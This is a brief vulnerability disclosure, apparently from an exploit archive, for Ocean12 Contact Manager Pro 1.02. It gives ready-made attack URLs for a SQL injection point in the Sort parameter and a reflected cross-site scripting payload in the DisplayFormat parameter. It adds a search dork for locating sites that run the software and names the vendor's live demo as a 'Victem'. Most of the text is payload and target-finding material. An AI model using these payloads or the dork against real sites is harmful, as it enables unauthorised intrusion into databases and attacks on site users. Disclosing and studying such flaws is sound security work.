Ocean12 Contact Manager Pro version 1.02 suffers from cross site scripting and SQL injection vulnerabilities.
2efeec148e87fb505d3418b1c57bc46e8b9826d0fcf5fe7d8af309a42e47d4b6
#########################################################
---------------------------------------------------------
Portal Name: Ocean12 Contact Manager Pro
Version : 1.02
Vendor : https://ocean12tech.com/products/contact
Dork: Maintained with the Ocean12 Contact Manager Pro v1.02
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,XSS)
---------------------------------------------------------
#########################################################
[SQL]:
https://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL]
[XSS]:
https://site.com/path/?DisplayFormat=>"><ScRiPt>alert(1369)%3B</ScRiPt>&Action=Pouya_Server
---------------------------------
Victem :
https://ocean12tech.com/products/contact/demo